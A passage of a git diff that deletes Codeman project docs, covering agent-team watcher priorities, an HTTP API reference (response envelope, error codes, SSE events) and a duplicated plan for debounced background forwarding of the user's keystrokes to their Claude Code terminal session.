7. **Distinguish teammates from subagents** — use description prefix `<teammate-message` or cross-reference config.json
|
||||
|
||||
### What to build first
|
||||
|
||||
1. **Team-aware idle detection** — highest priority, prevents premature respawn
|
||||
2. **TeamWatcher** — poll `~/.claude/teams/` for team creation/removal
|
||||
3. **Team tasks API** — parse task JSON files for UI display
|
||||
4. **Teammate badge in subagent windows** — mark teammate subagents differently from regular ones
|
||||
5. **Message timeline** — parse inbox files for inter-teammate communication display
|
||||
|
||||
### What we DON'T need to build
|
||||
|
||||
- Process discovery for teammates (they're threads)
|
||||
- Custom transcript tailing (subagent-watcher handles it)
|
||||
- Separate teammate window infrastructure (subagent windows work)
|
||||
@@ -1,90 +0,0 @@
|
||||
# HTTP API Reference
|
||||
|
||||
Codeman's HTTP API is a **stable contract** as of 1.0 — see
|
||||
[`versioning-policy.md`](versioning-policy.md) for the SemVer guarantee. This page
|
||||
defines the response envelope, status codes, error codes, versioning, and the SSE
|
||||
event channel.
|
||||
|
||||
## Versioning
|
||||
|
||||
- The stable, public surface is served under **`/api/v1/...`**. Pin external
|
||||
clients to this prefix.
|
||||
- The unversioned **`/api/...`** paths are a permanent alias of the current
|
||||
version (what the bundled web UI uses). They are kept working, but new external
|
||||
integrations should use `/api/v1`.
|
||||
- Breaking changes to the contract ship under a new prefix (`/api/v2`); `/api/v1`
|
||||
keeps its semantics. Additive changes (new endpoints, new optional fields, new
|
||||
error codes) are non-breaking and may appear in a minor release.
|
||||
- The implementation rewrites `/api/v1/*` → `/api/*` at the server level
|
||||
(`rewriteApiV1Url` in `src/web/server.ts`).
|
||||
|
||||
## Response envelope
|
||||
|
||||
Every JSON response uses one uniform envelope, applied centrally by a
|
||||
`preSerialization` hook (`src/web/server.ts`) — handlers return bare data and the
|
||||
hook wraps it:
|
||||
|
||||
**Success** — HTTP `2xx`:
|
||||
|
||||
```json
|
||||
{ "success": true, "data": <payload> }
|
||||
```
|
||||
|
||||
`data` is the endpoint's payload (object, array, or value). Endpoints with no
|
||||
payload return `{ "success": true, "data": {} }`.
|
||||
|
||||
**Error** — HTTP `4xx`/`5xx`:
|
||||
|
||||
```json
|
||||
{ "success": false, "error": "human-readable message", "errorCode": "NOT_FOUND" }
|
||||
```
|
||||
|
||||
`ApiResponse<T>` in `src/types/api.ts` is the canonical type.
|
||||
|
||||
> Non-JSON endpoints are exempt from the envelope: `GET /api/sessions/:id/file-raw`,
|
||||
> `GET /api/sessions/:id/tail-file` (SSE), `GET /api/download`,
|
||||
> `GET /api/screenshots/:name`, `GET /q/:code` (QR redirect), and the
|
||||
> `GET /ws/sessions/:id/terminal` WebSocket upgrade.
|
||||
|
||||
## Error codes → HTTP status
|
||||
|
||||
The single source of truth is `ErrorStatus` / `httpStatusForErrorCode()` in
|
||||
`src/types/api.ts`. Clients should branch on `errorCode` (stable) and may rely on
|
||||
the HTTP status.
|
||||
|
||||
| `errorCode` | HTTP | Meaning |
|
||||
|-------------|------|---------|
|
||||
| `INVALID_INPUT` | 400 | Malformed request / failed validation |
|
||||
| `UNAUTHORIZED` | 401 | Authentication required or failed |
|
||||
| `NOT_FOUND` | 404 | Resource does not exist |
|
||||
| `SESSION_BUSY` | 409 | Session is busy |
|
||||
| `CONFLICT` | 409 | Conflicts with current state (e.g. already running) |
|
||||
| `ALREADY_EXISTS` | 409 | Resource already exists |
|
||||
| `OPERATION_FAILED` | 422 | Well-formed but could not be completed |
|
||||
| `RATE_LIMITED` | 429 | Too many requests |
|
||||
| `INTERNAL_ERROR` | 500 | Unexpected server error |
|
||||
|
||||
Adding a new error code is non-breaking; removing or renaming one is a major change.
|
||||
|
||||
## Authentication
|
||||
|
||||
Optional HTTP Basic (`CODEMAN_USERNAME`/`CODEMAN_PASSWORD`) → opaque
|
||||
`codeman_session` cookie. When enabled, unauthenticated requests get
|
||||
`401 UNAUTHORIZED`; rate-limited requests get `429 RATE_LIMITED`. See
|
||||
[`security-architecture.md`](security-architecture.md).
|
||||
|
||||
## SSE event channel
|
||||
|
||||
`GET /api/events` is a Server-Sent Events stream (`text/event-stream`); each
|
||||
message is `event: <name>` + `data: <json>`. The event-name registry
|
||||
(`src/web/sse-events.ts`, mirrored in `src/web/public/constants.js`) is part of
|
||||
the stable contract — event names are not renamed without a major bump. An
|
||||
optional `?sessions=<id,...>` filter suppresses only the high-volume terminal
|
||||
stream; lifecycle/metadata events are delivered to all clients regardless.
|
||||
|
||||
## Consuming from JavaScript
|
||||
|
||||
The bundled frontend reads responses through `_apiJson()`
|
||||
(`src/web/public/api-client.js`), which unwraps `{success:true,data}` → `data` and
|
||||
returns `null` on a non-2xx / `{success:false}` response. External clients should
|
||||
do the same: check the HTTP status (or `body.success`), then read `body.data`.
|
||||
@@ -1,331 +0,0 @@
|
||||
# Plan: Background Keystroke Forwarding (Local Echo Mode)
|
||||
|
||||
> **Supersedes**: This document merges two previous plan drafts into a single authoritative reference:
|
||||
> - `docs/background-keystroke-forwarding-plan.md` (detailed design doc)
|
||||
> - `.claude/plans/jazzy-bubbling-salamander.md` (Claude-generated implementation plan)
|
||||
>
|
||||
> The docs plan was used as the base. The Claude plan was a correct but simplified subset; its Context paragraph is incorporated below as a lead-in.
|
||||
|
||||
## Context
|
||||
|
||||
When local echo is enabled, keystrokes accumulate in the `LocalEchoOverlay.pendingText` and are only sent to the server when Enter is pressed. This means switching tabs loses the input from the actual Claude Code PTY (the overlay caches text client-side, but the PTY has nothing). If the session respawns or resets, accumulated input is lost entirely.
|
||||
|
||||
## Problem
|
||||
|
||||
When local echo is enabled, keystrokes accumulate **only** in `LocalEchoOverlay.pendingText` (a client-side string). Nothing reaches the server PTY until Enter is pressed. This creates three failure modes:
|
||||
|
||||
1. **Tab switch loses PTY state** — switching sessions saves overlay text to `localEchoTextCache` (a Map), but the actual Claude Code Ink process has no knowledge of what was typed. If respawn or `/clear` fires on that session, the cached text is meaningless.
|
||||
2. **Session death loses input** — if the session crashes or respawns while text is pending in the overlay, that input is gone (localStorage backup `codeman_local_echo_pending` only survives page reloads, not session resets).
|
||||
3. **Tab completion impossible** — pressing Tab with pending overlay text sends the raw Tab character to a PTY that has no knowledge of the typed text, so completion fails.
|
||||
|
||||
## Goal
|
||||
|
||||
Send every keystroke to the server in the background (debounced), while the overlay continues providing instant visual feedback. The overlay sits at z-index 7 with an opaque background over `.xterm-screen`, masking Ink's echo of the background-sent characters. Input persists in the actual Claude Code readline buffer across tab switches and respawns.
|
||||
|
||||
## Architecture
|
||||
|
||||
```
|
||||
User keystroke
|
||||
|
|
||||
v
|
||||
xterm.js onData(data)
|
||||
|
|
||||
+---> LocalEchoOverlay.addChar(data) [instant visual feedback]
|
||||
|
|
||||
+---> _localEchoBgBuffer += data [queue for background send]
|
||||
| clearTimeout + setTimeout(50ms)
|
||||
| |
|
||||
| v (50ms debounce fires)
|
||||
| _flushBgInput()
|
||||
| |
|
||||
| v
|
||||
| _sendInputAsync(sessionId, buffer) [promise chain preserves order]
|
||||
| |
|
||||
| v
|
||||
| POST /api/sessions/:id/input [{ input: "hel" }]
|
||||
| |
|
||||
| v
|
||||
| session.write(inputStr) [direct PTY write, synchronous]
|
||||
| |
|
||||
| v
|
||||
| Ink readline echoes "hel" [hidden behind overlay's opaque bg]
|
||||
|
|
||||
+--- On Enter:
|
||||
1. clearTimeout(_localEchoBgTimer)
|
||||
2. flush _localEchoBgBuffer via _sendInputAsync (remaining chars)
|
||||
3. clear overlay
|
||||
4. 120ms later: send \r via _sendInputAsync (Ink text/Enter split)
|
||||
5. Ink processes "hello\r" → overlay gone, terminal visible with output
|
||||
```
|
||||
|
||||
### Two Input Paths (important context)
|
||||
|
||||
The codebase has **two separate input paths** to the server:
|
||||
|
||||
| Path | Used by | Promise chain? | `useMux`? |
|
||||
|------|---------|---------------|-----------|
|
||||
| `_sendInputAsync()` (line 3626) | `onData` handler, `flushInput()` | Yes (`_inputSendChain`) | No (direct PTY write) |
|
||||
| `sendInput()` (line 8755) | Mobile accessory bar, programmatic commands | **No** (raw `fetch`) | Yes (tmux `send-keys`) |
|
||||
|
||||
Background keystroke forwarding uses **only** the `_sendInputAsync` path, which guarantees ordering via the promise chain. The `sendInput()` path is unaffected and unmodified.
|
||||
|
||||
### Server-Side Input Flow
|
||||
|
||||
```
|
||||
POST /api/sessions/:id/input { input: "hel" }
|
||||
|
|
||||
+-- useMux? No (default)
|
||||
| session.write("hel") → ptyProcess.write("hel") [sync]
|
||||
|
|
||||
+-- useMux? Yes
|
||||
session.writeViaMux("hel") → tmux send-keys -l "hel" [async]
|
||||
```
|
||||
|
||||
Background sends use the default path (no `useMux`), which is a synchronous direct PTY write — faster than spawning a tmux subprocess for each character batch.
|
||||
|
||||
## Implementation
|
||||
|
||||
All changes in **one file**: `src/web/public/app.js`
|
||||
|
||||
### Step 1: Add background send state (in terminal setup, after line ~1999)
|
||||
|
||||
```js
|
||||
this._localEchoBgBuffer = ''; // Characters queued for background send
|
||||
this._localEchoBgTimer = null; // 50ms debounce timer ID
|
||||
```
|
||||
|
||||
Add an atomic drain helper alongside existing `flushInput` (after line ~2008):
|
||||
|
||||
```js
|
||||
// Atomically drain background buffer — returns contents and cancels pending timer.
|
||||
// Single point of extraction prevents double-flush race conditions.
|
||||
const drainBgBuffer = () => {
|
||||
if (this._localEchoBgTimer) {
|
||||
clearTimeout(this._localEchoBgTimer);
|
||||
this._localEchoBgTimer = null;
|
||||
}
|
||||
const buf = this._localEchoBgBuffer;
|
||||
this._localEchoBgBuffer = '';
|
||||
return buf;
|
||||
};
|
||||
|
||||
const scheduleBgFlush = () => {
|
||||
if (this._localEchoBgTimer) clearTimeout(this._localEchoBgTimer);
|
||||
this._localEchoBgTimer = setTimeout(() => {
|
||||
this._localEchoBgTimer = null;
|
||||
const buf = this._localEchoBgBuffer;
|
||||
this._localEchoBgBuffer = '';
|
||||
if (buf && this.activeSessionId) {
|
||||
this._sendInputAsync(this.activeSessionId, buf);
|
||||
}
|
||||
}, 50);
|
||||
};
|
||||
```
|
||||
|
||||
**Why `drainBgBuffer` exists**: Every exit path (Enter, Ctrl+C, tab switch, echo disable) needs to flush the buffer AND cancel the timer atomically. Without a single extraction point, it's easy to forget one of the two operations, leading to double-sends when the timer fires after a manual flush.
|
||||
|
||||
### Step 2: Modify `onData` handler — local echo path (lines 2023–2067)
|
||||
|
||||
**Printable characters** (lines 2063–2067 → replace):
|
||||
```js
|
||||
if (data.length === 1 && data.charCodeAt(0) >= 32) {
|
||||
this._localEchoOverlay?.addChar(data);
|
||||
// Background: queue char for server send (50ms debounce batches rapid typing)
|
||||
this._localEchoBgBuffer += data;
|
||||
scheduleBgFlush();
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
**Backspace** (lines 2024–2028 → replace):
|
||||
```js
|
||||
if (data === '\x7f') {
|
||||
this._localEchoOverlay?.removeChar();
|
||||
// Background: queue DEL for server (Ink's readline handles backspace via \x7f)
|
||||
this._localEchoBgBuffer += '\x7f';
|
||||
scheduleBgFlush();
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
**Enter** (lines 2029–2050 → replace):
|
||||
```js
|
||||
if (/^[\r\n]+$/.test(data)) {
|
||||
this._localEchoOverlay?.clear();
|
||||
if (this._inputFlushTimeout) {
|
||||
clearTimeout(this._inputFlushTimeout);
|
||||
this._inputFlushTimeout = null;
|
||||
}
|
||||
// Flush any remaining background chars (e.g., last 50ms batch not yet sent)
|
||||
const remaining = drainBgBuffer();
|
||||
if (remaining) {
|
||||
this._sendInputAsync(this.activeSessionId, remaining);
|
||||
}
|
||||
// Send \r after 120ms — Ink needs text and Enter as separate events.
|
||||
// The promise chain in _sendInputAsync guarantees the remaining chars
|
||||
// are dispatched before \r, regardless of timing.
|
||||
setTimeout(() => {
|
||||
this._pendingInput += '\r';
|
||||
flushInput();
|
||||
}, 120);
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
**Key change from original plan**: The Enter handler no longer checks `if (text)` and branches on whether the overlay had content. With background sends, the PTY already has most/all of the text. We just flush any remainder and unconditionally send `\r` after 120ms. This simplifies the flow and handles edge cases like "user typed nothing but pressed Enter" (remainder is empty, just `\r` is sent).
|
||||
|
||||
**Control characters and paste** (lines 2052–2061 → replace):
|
||||
```js
|
||||
if (data.charCodeAt(0) < 32 || data.length > 1) {
|
||||
this._localEchoOverlay?.clear();
|
||||
// Flush background buffer so PTY has full text state before control char
|
||||
// (critical for Tab completion — PTY needs typed text to complete against)
|
||||
const remaining = drainBgBuffer();
|
||||
if (remaining) {
|
||||
this._sendInputAsync(this.activeSessionId, remaining);
|
||||
}
|
||||
// Send control char / paste text via normal path
|
||||
this._pendingInput += data;
|
||||
if (this._inputFlushTimeout) {
|
||||
clearTimeout(this._inputFlushTimeout);
|
||||
this._inputFlushTimeout = null;
|
||||
}
|
||||
flushInput();
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
**Note on paste**: Desktop paste arrives via `onData` as a single multi-character string (`data.length > 1`). This falls into the control char path above, which:
|
||||
1. Clears the overlay (existing behavior)
|
||||
2. Flushes background buffer (new — ensures PTY has prefix text)
|
||||
3. Sends paste text immediately (existing behavior)
|
||||
|
||||
Mobile paste via `KeyboardAccessoryBar.pasteFromClipboard()` uses `app.sendInput()` which bypasses `onData` entirely — no change needed.
|
||||
|
||||
### Step 3: Flush on tab switch (`selectSession()`, line ~4533)
|
||||
|
||||
Insert before the existing overlay save/clear block (before line 4534):
|
||||
|
||||
```js
|
||||
// Flush background send buffer for outgoing session
|
||||
if (this.activeSessionId) {
|
||||
const remaining = drainBgBuffer();
|
||||
if (remaining) {
|
||||
this._sendInputAsync(this.activeSessionId, remaining);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
This ensures the PTY receives all typed characters before the tab switch. When the user switches back, the terminal buffer will show the text (echoed by Ink) and the overlay will restore its cached copy on top.
|
||||
|
||||
### Step 4: Cleanup on local echo disable (`_updateLocalEchoState()`, lines 2362–2371)
|
||||
|
||||
Expand the disable transition (line 2367–2368):
|
||||
```js
|
||||
if (this._localEchoEnabled && !shouldEnable) {
|
||||
this._localEchoOverlay?.clear();
|
||||
// Flush any pending background chars before disabling
|
||||
const remaining = drainBgBuffer();
|
||||
if (remaining && this.activeSessionId) {
|
||||
this._sendInputAsync(this.activeSessionId, remaining);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Step 5: Cleanup on session delete (`deleteSession()`)
|
||||
|
||||
When a session is deleted, cancel any pending background timer for that session:
|
||||
```js
|
||||
// In deleteSession(), after removing the session from this.sessions:
|
||||
drainBgBuffer(); // Discard — session is gone, nowhere to send
|
||||
this.localEchoTextCache.delete(sessionId);
|
||||
```
|
||||
|
||||
## Visual Timeline
|
||||
|
||||
```
|
||||
t=0ms User types "h" → overlay: "h" bgBuffer: "h" timer: 50ms
|
||||
t=30ms User types "e" → overlay: "he" bgBuffer: "he" timer: reset 50ms
|
||||
t=60ms User types "l" → overlay: "hel" bgBuffer: "hel" timer: reset 50ms
|
||||
t=110ms Debounce fires → overlay: "hel" bgBuffer: "" POST "hel" → PTY
|
||||
t=115ms Ink echoes "hel" → terminal: "❯ hel" (hidden behind overlay)
|
||||
t=140ms User types "l" → overlay: "hell" bgBuffer: "l" timer: 50ms
|
||||
t=170ms User types "o" → overlay: "hello" bgBuffer: "lo" timer: reset 50ms
|
||||
t=220ms Debounce fires → overlay: "hello" bgBuffer: "" POST "lo" → PTY
|
||||
t=250ms User hits Enter → drainBgBuffer()="" overlay: cleared
|
||||
t=370ms \r sent via chain → Ink processes "hello\r" → output appears
|
||||
```
|
||||
|
||||
**Tab switch scenario:**
|
||||
```
|
||||
t=0ms User types "wor" → overlay: "wor" bgBuffer: "wor" timer: 50ms
|
||||
t=25ms User switches tab → drainBgBuffer() sends "wor" to old session PTY
|
||||
overlay text "wor" saved to localEchoTextCache
|
||||
overlay cleared, new session loaded
|
||||
...later...
|
||||
t=5000ms User switches back → terminal shows "❯ wor" (Ink echo from background send)
|
||||
overlay restores "wor" from cache, masks terminal
|
||||
user continues typing seamlessly
|
||||
```
|
||||
|
||||
## Edge Cases & Mitigations
|
||||
|
||||
### Confirmed Safe (JS single-threaded guarantee)
|
||||
|
||||
| Scenario | Why it's safe |
|
||||
|----------|--------------|
|
||||
| **Debounce fires during Enter handler** | Impossible. JS event loop is single-threaded — the Enter handler runs atomically. `drainBgBuffer()` cancels the timer before it can fire. |
|
||||
| **Debounce fires during tab switch** | Same reason. `selectSession()` calls `drainBgBuffer()` synchronously, canceling the timer. |
|
||||
| **Double-send of background buffer** | `drainBgBuffer()` atomically clears both buffer and timer. Once drained, subsequent drain returns empty string. |
|
||||
| **`_pendingInput` conflict** | In local echo mode, `_pendingInput` is only used for Enter (`\r`) and control chars. Background chars use a separate `_localEchoBgBuffer`. No overlap. |
|
||||
|
||||
### Handled by Design
|
||||
|
||||
| Scenario | Handling |
|
||||
|----------|---------|
|
||||
| **Rapid typing / paste** | 50ms debounce batches rapid chars. At 100 WPM (~50ms/char), sends ~1 char per batch. For paste (multi-char string, `data.length > 1`), the control char path bypasses the buffer entirely and sends immediately. |
|
||||
| **Network failure** | `_sendInputAsync` catches fetch failures and calls `_enqueueInput()` for retry. `_drainInputQueues()` replays on reconnect. Background chars use the same retry path. |
|
||||
| **Offline mode** | `_sendInputAsync` checks `this.isOnline` and immediately enqueues if offline. Same behavior for background sends. 64KB queue cap prevents memory growth. |
|
||||
| **Tab completion** | Ctrl+Tab path flushes background buffer BEFORE sending Tab char. PTY has full text for readline completion. |
|
||||
| **Session respawn** | PTY already has typed text (sent in background). On respawn, Claude exits and restarts — Ink's readline buffer is lost, but the text was already processed or is no longer relevant. The overlay clears on session status change via `_updateLocalEchoState()`. |
|
||||
| **SSE reconnect** | `handleInit()` saves overlay text before `selectSession()` clears it, then restores after reload (line ~3945–3966). Background buffer is cleared on reconnect since state is reset. |
|
||||
|
||||
### Network Ordering
|
||||
|
||||
**Question**: Can background sends arrive at the server out of order?
|
||||
|
||||
**Answer**: No, for practical purposes.
|
||||
|
||||
1. `_sendInputAsync` uses a **promise chain** (`_inputSendChain`) — each fetch is dispatched only after the previous one has been dispatched. This means requests are sent in order.
|
||||
2. Localhost connections (HTTP/1.1) are inherently sequential on a single TCP connection.
|
||||
3. Even with HTTP/2 multiplexing, Fastify (Node.js) is single-threaded — request handlers execute via the event loop in arrival order.
|
||||
4. The server's `session.write()` is synchronous — it writes to the PTY immediately within the request handler.
|
||||
|
||||
### Known Limitations (Not Addressed)
|
||||
|
||||
| Limitation | Impact | Notes |
|
||||
|-----------|--------|-------|
|
||||
| **IME composition** | CJK input via IME would send partial composition sequences to PTY | No IME handling exists in the codebase today (line count: 0 references to `compositionstart/end/update`). Fixing this is a separate feature. |
|
||||
| **`sendInput()` ordering** | Mobile accessory bar commands (`/init`, `/clear`, paste) use `sendInput()` which bypasses `_inputSendChain` — no ordering guarantee relative to background sends | Unlikely to conflict in practice: accessory bar clears the overlay first, and the commands are typically sent when no typing is in progress. |
|
||||
| **localStorage stale text** | After background sends, localStorage still has overlay text. On hard reload, overlay restores text that the PTY already has → visual duplicate behind overlay | Harmless — overlay masks the terminal. On Enter, overlay clears and terminal shows correct state. Could be fixed by clearing localStorage after successful background flush, but adds complexity for minimal benefit. |
|
||||
|
||||
## Verification Checklist
|
||||
|
||||
1. **Basic typing**: Enable local echo → type "hello" → overlay shows instantly → check Network tab for batched POST requests (~50ms intervals) → press Enter → command executes
|
||||
2. **Tab switch persistence**: Type "test" → switch to another tab → switch back → text visible in both overlay AND terminal prompt
|
||||
3. **Backspace**: Type "helloo" → press backspace → overlay shows "hello" → check PTY received \x7f
|
||||
4. **Paste**: Type "hel" → paste "lo world" → overlay clears → "lo world" sent immediately → PTY has "hello world"
|
||||
5. **Tab completion**: Type "src/w" → press Tab → PTY completes to "src/web/" (background send gave PTY the prefix)
|
||||
6. **Ctrl+C**: Type "hello" → press Ctrl+C → overlay clears → PTY receives pending chars + \x03
|
||||
7. **Network tab**: Verify POST /api/sessions/:id/input requests appear as you type (batched ~50ms)
|
||||
8. **Offline resilience**: Disconnect network → type "hello" → reconnect → verify chars are replayed via drain queue
|
||||
9. **Session delete**: Type text → delete session → no console errors from orphaned timer
|
||||
10. **Mobile keyboard**: Test on mobile device — typing goes through same onData path, same behavior expected
|
||||
|
||||
## Files Modified
|
||||
|
||||
| File | Changes |
|
||||
|------|---------|
|
||||
| `src/web/public/app.js` | ~40 lines changed across 5 locations (Steps 1–5) |
|
||||
|
||||
No server-side changes. No new files. No new dependencies.
|
||||
@@ -1,321 +0,0 @@
|
||||
# Plan: Background Keystroke Forwarding (Local Echo Mode)
|
||||
|
||||
## Problem
|
||||
|
||||
When local echo is enabled, keystrokes accumulate **only** in `LocalEchoOverlay.pendingText` (a client-side string). Nothing reaches the server PTY until Enter is pressed. This creates three failure modes:
|
||||
|
||||
1. **Tab switch loses PTY state** — switching sessions saves overlay text to `localEchoTextCache` (a Map), but the actual Claude Code Ink process has no knowledge of what was typed. If respawn or `/clear` fires on that session, the cached text is meaningless.
|
||||
2. **Session death loses input** — if the session crashes or respawns while text is pending in the overlay, that input is gone (localStorage backup `codeman_local_echo_pending` only survives page reloads, not session resets).
|
||||
3. **Tab completion impossible** — pressing Tab with pending overlay text sends the raw Tab character to a PTY that has no knowledge of the typed text, so completion fails.
|
||||
|
||||
## Goal
|
||||
|
||||
Send every keystroke to the server in the background (debounced), while the overlay continues providing instant visual feedback. The overlay sits at z-index 7 with an opaque background over `.xterm-screen`, masking Ink's echo of the background-sent characters. Input persists in the actual Claude Code readline buffer across tab switches and respawns.
|
||||
|
||||
## Architecture
|
||||
|
||||
```
|
||||
User keystroke
|
||||
|
|
||||
v
|
||||
xterm.js onData(data)
|
||||
|
|
||||
+---> LocalEchoOverlay.addChar(data) [instant visual feedback]
|
||||
|
|
||||
+---> _localEchoBgBuffer += data [queue for background send]
|
||||
| clearTimeout + setTimeout(50ms)
|
||||
| |
|
||||
| v (50ms debounce fires)
|
||||
| _flushBgInput()
|
||||
| |
|
||||
| v
|
||||
| _sendInputAsync(sessionId, buffer) [promise chain preserves order]
|
||||
| |
|
||||
| v
|
||||
| POST /api/sessions/:id/input [{ input: "hel" }]
|
||||
| |
|
||||
| v
|
||||
| session.write(inputStr) [direct PTY write, synchronous]
|
||||
| |
|
||||
| v
|
||||
| Ink readline echoes "hel" [hidden behind overlay's opaque bg]
|
||||
|
|
||||
+--- On Enter:
|
||||
1. clearTimeout(_localEchoBgTimer)
|
||||
2. flush _localEchoBgBuffer via _sendInputAsync (remaining chars)
|
||||
3. clear overlay
|
||||
4. 120ms later: send \r via _sendInputAsync (Ink text/Enter split)
|
||||
5. Ink processes "hello\r" → overlay gone, terminal visible with output
|
||||
```
|
||||
|
||||
### Two Input Paths (important context)
|
||||
|
||||
The codebase has **two separate input paths** to the server:
|
||||
|
||||
| Path | Used by | Promise chain? | `useMux`? |
|
||||
|------|---------|---------------|-----------|
|
||||
| `_sendInputAsync()` (line 3626) | `onData` handler, `flushInput()` | Yes (`_inputSendChain`) | No (direct PTY write) |
|
||||
| `sendInput()` (line 8755) | Mobile accessory bar, programmatic commands | **No** (raw `fetch`) | Yes (tmux `send-keys`) |
|
||||
|
||||
Background keystroke forwarding uses **only** the `_sendInputAsync` path, which guarantees ordering via the promise chain. The `sendInput()` path is unaffected and unmodified.
|
||||
|
||||
### Server-Side Input Flow
|
||||
|
||||
```
|
||||
POST /api/sessions/:id/input { input: "hel" }
|
||||
|
|
||||
+-- useMux? No (default)
|
||||
| session.write("hel") → ptyProcess.write("hel") [sync]
|
||||
|
|
||||
+-- useMux? Yes
|
||||
session.writeViaMux("hel") → tmux send-keys -l "hel" [async]
|
||||
```
|
||||
|
||||
Background sends use the default path (no `useMux`), which is a synchronous direct PTY write — faster than spawning a tmux subprocess for each character batch.
|
||||
|
||||
## Implementation
|
||||
|
||||
All changes in **one file**: `src/web/public/app.js`
|
||||
|
||||
### Step 1: Add background send state (in terminal setup, after line ~1999)
|
||||
|
||||
```js
|
||||
this._localEchoBgBuffer = ''; // Characters queued for background send
|
||||
this._localEchoBgTimer = null; // 50ms debounce timer ID
|
||||
```
|
||||
|
||||
Add an atomic drain helper alongside existing `flushInput` (after line ~2008):
|
||||
|
||||
```js
|
||||
// Atomically drain background buffer — returns contents and cancels pending timer.
|
||||
// Single point of extraction prevents double-flush race conditions.
|
||||
const drainBgBuffer = () => {
|
||||
if (this._localEchoBgTimer) {
|
||||
clearTimeout(this._localEchoBgTimer);
|
||||
this._localEchoBgTimer = null;
|
||||
}
|
||||
const buf = this._localEchoBgBuffer;
|
||||
this._localEchoBgBuffer = '';
|
||||
return buf;
|
||||
};
|
||||
|
||||
const scheduleBgFlush = () => {
|
||||
if (this._localEchoBgTimer) clearTimeout(this._localEchoBgTimer);
|
||||
this._localEchoBgTimer = setTimeout(() => {
|
||||
this._localEchoBgTimer = null;
|
||||
const buf = this._localEchoBgBuffer;
|
||||
this._localEchoBgBuffer = '';
|
||||
if (buf && this.activeSessionId) {
|
||||
this._sendInputAsync(this.activeSessionId, buf);
|
||||
}
|
||||
}, 50);
|
||||
};
|
||||
```
|
||||
|
||||
**Why `drainBgBuffer` exists**: Every exit path (Enter, Ctrl+C, tab switch, echo disable) needs to flush the buffer AND cancel the timer atomically. Without a single extraction point, it's easy to forget one of the two operations, leading to double-sends when the timer fires after a manual flush.
|
||||
|
||||
### Step 2: Modify `onData` handler — local echo path (lines 2023–2067)
|
||||
|
||||
**Printable characters** (lines 2063–2067 → replace):
|
||||
```js
|
||||
if (data.length === 1 && data.charCodeAt(0) >= 32) {
|
||||
this._localEchoOverlay?.addChar(data);
|
||||
// Background: queue char for server send (50ms debounce batches rapid typing)
|
||||
this._localEchoBgBuffer += data;
|
||||
scheduleBgFlush();
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
**Backspace** (lines 2024–2028 → replace):
|
||||
```js
|
||||
if (data === '\x7f') {
|
||||
this._localEchoOverlay?.removeChar();
|
||||
// Background: queue DEL for server (Ink's readline handles backspace via \x7f)
|
||||
this._localEchoBgBuffer += '\x7f';
|
||||
scheduleBgFlush();
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
**Enter** (lines 2029–2050 → replace):
|
||||
```js
|
||||
if (/^[\r\n]+$/.test(data)) {
|
||||
this._localEchoOverlay?.clear();
|
||||
if (this._inputFlushTimeout) {
|
||||
clearTimeout(this._inputFlushTimeout);
|
||||
this._inputFlushTimeout = null;
|
||||
}
|
||||
// Flush any remaining background chars (e.g., last 50ms batch not yet sent)
|
||||
const remaining = drainBgBuffer();
|
||||
if (remaining) {
|
||||
this._sendInputAsync(this.activeSessionId, remaining);
|
||||
}
|
||||
// Send \r after 120ms — Ink needs text and Enter as separate events.
|
||||
// The promise chain in _sendInputAsync guarantees the remaining chars
|
||||
// are dispatched before \r, regardless of timing.
|
||||
setTimeout(() => {
|
||||
this._pendingInput += '\r';
|
||||
flushInput();
|
||||
}, 120);
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
**Key change from original plan**: The Enter handler no longer checks `if (text)` and branches on whether the overlay had content. With background sends, the PTY already has most/all of the text. We just flush any remainder and unconditionally send `\r` after 120ms. This simplifies the flow and handles edge cases like "user typed nothing but pressed Enter" (remainder is empty, just `\r` is sent).
|
||||
|
||||
**Control characters and paste** (lines 2052–2061 → replace):
|
||||
```js
|
||||
if (data.charCodeAt(0) < 32 || data.length > 1) {
|
||||
this._localEchoOverlay?.clear();
|
||||
// Flush background buffer so PTY has full text state before control char
|
||||
// (critical for Tab completion — PTY needs typed text to complete against)
|
||||
const remaining = drainBgBuffer();
|
||||
if (remaining) {
|
||||
this._sendInputAsync(this.activeSessionId, remaining);
|
||||
}
|
||||
// Send control char / paste text via normal path
|
||||
this._pendingInput += data;
|
||||
if (this._inputFlushTimeout) {
|
||||
clearTimeout(this._inputFlushTimeout);
|
||||
this._inputFlushTimeout = null;
|
||||
}
|
||||
flushInput();
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
**Note on paste**: Desktop paste arrives via `onData` as a single multi-character string (`data.length > 1`). This falls into the control char path above, which:
|
||||
1. Clears the overlay (existing behavior)
|
||||
2. Flushes background buffer (new — ensures PTY has prefix text)
|
||||
3. Sends paste text immediately (existing behavior)
|
||||
|
||||
Mobile paste via `KeyboardAccessoryBar.pasteFromClipboard()` uses `app.sendInput()` which bypasses `onData` entirely — no change needed.
|
||||
|
||||
### Step 3: Flush on tab switch (`selectSession()`, line ~4533)
|
||||
|
||||
Insert before the existing overlay save/clear block (before line 4534):
|
||||
|
||||
```js
|
||||
// Flush background send buffer for outgoing session
|
||||
if (this.activeSessionId) {
|
||||
const remaining = drainBgBuffer();
|
||||
if (remaining) {
|
||||
this._sendInputAsync(this.activeSessionId, remaining);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
This ensures the PTY receives all typed characters before the tab switch. When the user switches back, the terminal buffer will show the text (echoed by Ink) and the overlay will restore its cached copy on top.
|
||||
|
||||
### Step 4: Cleanup on local echo disable (`_updateLocalEchoState()`, lines 2362–2371)
|
||||
|
||||
Expand the disable transition (line 2367–2368):
|
||||
```js
|
||||
if (this._localEchoEnabled && !shouldEnable) {
|
||||
this._localEchoOverlay?.clear();
|
||||
// Flush any pending background chars before disabling
|
||||
const remaining = drainBgBuffer();
|
||||
if (remaining && this.activeSessionId) {
|
||||
this._sendInputAsync(this.activeSessionId, remaining);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Step 5: Cleanup on session delete (`deleteSession()`)
|
||||
|
||||
When a session is deleted, cancel any pending background timer for that session:
|
||||
```js
|
||||
